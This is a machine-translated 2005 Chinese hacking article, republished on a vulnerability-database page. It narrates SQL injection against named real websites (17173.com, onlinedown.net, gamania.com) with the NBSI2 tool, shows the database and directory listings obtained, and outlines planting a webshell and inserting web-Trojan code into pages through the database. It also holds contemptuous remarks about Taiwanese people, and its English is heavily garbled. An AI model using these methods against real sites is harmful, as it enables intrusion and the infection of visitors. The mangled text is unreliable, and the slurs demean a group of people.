Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220055956
HistoryDec 31, 2005 - 12:00 a.m.

Web Trojans implantation techniques-vulnerability warning-the black bar safety net

2005-12-3100:00:00
佚名
www.myhack58.com
59
JSON

Recently hung it too much. I depressed an Internet access everywhere is the horse that the big webmasters can promptly Put a hole in the patch. Here I’ll give you an idea not to write specific intrusion methods and what what good.

Everyone knows that static HTML is not injected and I look at how he is a dynamic page so had a look at the source code
<td class=“NewsContent2”><p><table width=1 0 0% border=0><tr><td><div align=center><font color=#0 0 0 0 6 6 size=4><strong> the strength of the orchestra of the charges in the instant a new song and Jin-explosive</strong></font></div><br>< div align=center><span class=p2><font color=#6 6 6 6 6 6>2 0 0 5-year 0 4 month 1 6 day</font> 【<a href=http://news. 1 7 1 7 3. com/newsarticle/ target=_parent>the award-winning news clues provided</a>】 <font color=#FF0000>【<a href=http://news. 1 7 1 7 3. com/m_false. asp? newsid=7 4 5 6 5&newstitle=the stiffness of the orchestra of the charges in the instant a new song and Jin-explosive><font color=#FF0000>the award-winning“pulling”wrong</font></a>】</font> <font color=#FF0000>【<a href=http://news. 1 7 1 7 3. com/newsarticle/><font color=#FF0000>news submission</font></a>】</font> 【<a href=# ><font color=#0000FF>to phone recommend friends</font></a>】</span></div><br>< span id='tabNewsContent' class=NewsContent2><iframe src=“http://www.17173.com/if/top-new1.html”; name=“contentFRM” id=“contentFRM” scrolling=“no” width=“3 2 6” height=“3 5 0” marginwidth=“0” marginheight=“0” frameborder=“0” align=“left”></iframe> fashion Music Online Games the Jin Orchestra of the beta Hot, the music of the Kingdom to prosper, the player what they want the music turned the day, the Jin Orchestra of new areas are constantly added, the line number of the rapid rise in 2 0 0 5 year 4 beginning in one fell swoop exceeded 1 8 million mark! At the same time the stiffness of the orchestra on a permanent free operation of the message is to shock the majority of the players of hearts.& lt;br>
We saw this a period of no
http://news.17173.com/m_false.asp?newsid=74565
Here is an ASP, so I will use the NBSI2 ran it a see the results turned out… Speechless has notified webmasters
Well 1 7 1 7 3. We look at the huajun software Park
Just open a news page
http://news.onlinedown.net/info/12378-1.htm
Good.
We look at the source code
<img border=“0” src=“…/down_info. asp? id=1 2 3 7 8” width=“1” height=“1”>
See it is an ASP address
We take NBSI2 run and see what happens http://news. onlinedown. net/down_info. asp? id=1 2 3 7 8
Information capture the HTTP header and IIS prompt analysis

Injection method character type
Database SQLSERVER'error message on
SQLSERVER information
Multiple-statement execution support
The current user onlinedownnewhua
User permissions turned out to be DB_OWNER
The current library NewHua
We look across the library to see what database
Database list
master./ tempdb./ mofel./ msdb./ puds./ NOrthwind./ newhua*./
His database and it was broke.
But also nothing to use?
Think it know the path can be used after the backupwebshell class of software hang him
The point of his tool NB TREE_list
The first look of his C drive what
The input path
c:\\\\

C:\\Documents and Settings\\\\

C:\\Downloads\\\\

C:\\Program Files\\\\

C:\\RECYCLER\\\\

C:\\System Volume Information\\\\

C:\\WINNT\\\\

the same. log
Here I no longer go on the Hua Jun then the big one website turned out there is so much vulnerability can think of
The May ready to also get ready for what the Sino-Japanese hacker War, I think the first number is black might just be him.
Now we go look at the Taiwan oranges official cafe
Little Taiwan? Not to his face I he
Game orange there is a pretty stupid vulnerability.
Taiwan people really stupid Ah. What the independent cross-site vulnerability Oh we just go and look at the
All know that the so-called cross-site attacks, is a program for user input of data lack of adequate filter, when website visitors browse information, is input malicious script will be executed, which may be inserted into one end of the text, may be the steal browser cookie information of java Script, the more even The is a period of use of the IE vulnerability web Trojan code. This attack method and get the webshell after the inserted Trojan code to achieve up to a simple much easier, of course, this method also has its drawbacks, which we’ll discuss. First, implement cross-site attacks a prerequisite, of course, is the web page to be the presence of the input of the information filter is not strict place. In some large non-interactive type of site, such input points are generally easy to find, so directly from the surface of the start is quite tricky.
We change an angle to consider, if this website existssql injection, the result is different. I here that the database is for a MSSQL database, of course, for mysql and other databases at the same time effective, but the process is a bit more difficult to use or get boring but it is very effectiveSQL injectionvulnerabilities, but does not require admin permissions, as long as there is Update permission is enough, generally a member of the Db_owner just to have that privilege. We directly modify the database information, so that the asp program in the call to the database, will modify the web page after the Trojan code displayed on the page. Below I will use an example to show what the attack process.
Browse Taiwan orange site: http://www.gamania.com的时候 found this place to be injection:
http://fateasia.gamania.com/turtle/index.asp?sid=E00001 心中 一阵 窃喜 the. Like this large Station can also be injected, then hold fluky psychology to come up with a housekeeping tool NBSI go for a walk, guess the solution of the following information:
Oh someone database confidentiality ha
The specific method I have to speak, I will not nag again. Get the path after, Of course, is backupwebshell.
Since I haven’t seen the cyf of this tool is how the int type and character type data of the judgment, it is in the Url parameter, a’, that is of the integer data of the injection. Below we look at the results how to:

Failure, it seems that a conventional attack will not have any new breakthrough or another his law.

JSON